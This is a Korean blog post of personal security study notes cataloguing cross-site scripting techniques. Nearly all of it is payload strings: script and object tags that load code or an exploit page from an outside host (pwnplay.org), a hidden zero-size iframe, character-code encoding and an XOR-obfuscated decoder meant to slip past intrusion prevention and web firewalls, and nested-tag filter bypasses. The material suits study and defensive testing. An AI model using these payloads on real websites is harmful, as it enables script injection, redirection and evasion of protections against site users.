Security Study/Web

XSS 공격기법

LuCeT3 2015. 12. 1.
728x90
반응형

XSS (Cross Site Scripting) 크로스 사이트 스크립트은 서버의 서비스를 공격하는 일반적인 해킹방법이 아니라 해당 서버를 사용하는 사용자를 공격하는 기법이다.


1. XSS


일반적인 공격 기법은 <script>alert("XSS")</script> 이러한 구문을 넣음으로 취약점이 있는지 알아본다.



ex) 클릭시 타사이트로 이동

<a href="http://naver.com<script src='http://pwnplay.org/test'></script>">Click</a>


2. iframe 태그


타사이트로 연결 가능하게 함


ex) 숨겨진 iframe를 이용해 타사이트로 이동

<iframe src=" http://pwnplay.org" width="0" height="0" frameborder="0"></iframe>


3. object 태그


ex) 지정한 파일이 존재하지 않을 다사이트로 이동하도록 함.

<object width=0 height=0 sytle=display:none; type=text/xscriptlet data=mk:@MSITStore:mhtml:c:\nosuchfile.mht! http://pwnplay.org/attack_chm::exploit.html></object>


4. div 기법


ex) div 태그를 사용하여 이미지 등을 삽입시킨다.

<div style="position:absolute; left:200; top:90; z-index:2;">

    <img src="images/test.jpg">

</div>


5. 인코딩 기법


ex) 공격하려는 문자열을 다른 표현으로 인코딩하여 눈에 띠지 않거나, IPS, 웹방화벽 드의 감지패턴을 우회하기 위하여 인코딩한다.


원본 : <script>alert("test");</script>

인코딩 : <script>alert(String.fromCharCode(116, 101, 115, 116))</script>


6. Obfuscated 기법


ex) 인코딩 기법과 같이 우회하기 위해 사용한다.

<s-ript language="javas-ript">

    e = '0x00' + '5F';

    str1 = "%E4%BC%B7%AA%C0%AD ....... %AA%E2";

    str = tmp = '';


    for(i=0; i<str1.length; i+=3)

    { 

        tmp = unescape(str1.slice(i,i+3));

        str = str + String.fromCharCode((tmp.charCodeAt(0)^e)-127);

    }


    document.write(str); 

</script>


7. 기타우회 방법 


;</script><script>alert("xss");</script>


<scr<script>ipt>alert("xss");</scr</script>ipt>






[참조]http://egloos.zum.com/tiger5net/v/5055050

728x90
반응형

'Security Study > Web' 카테고리의 다른 글

string filter(php)  (0) 2016.10.05
hosting 을하기위한 기본?  (0) 2015.12.13
웹 해킹 기본  (0) 2015.11.24
구글 해킹  (0) 2015.11.21
web 2일차  (0) 2015.10.23

댓글0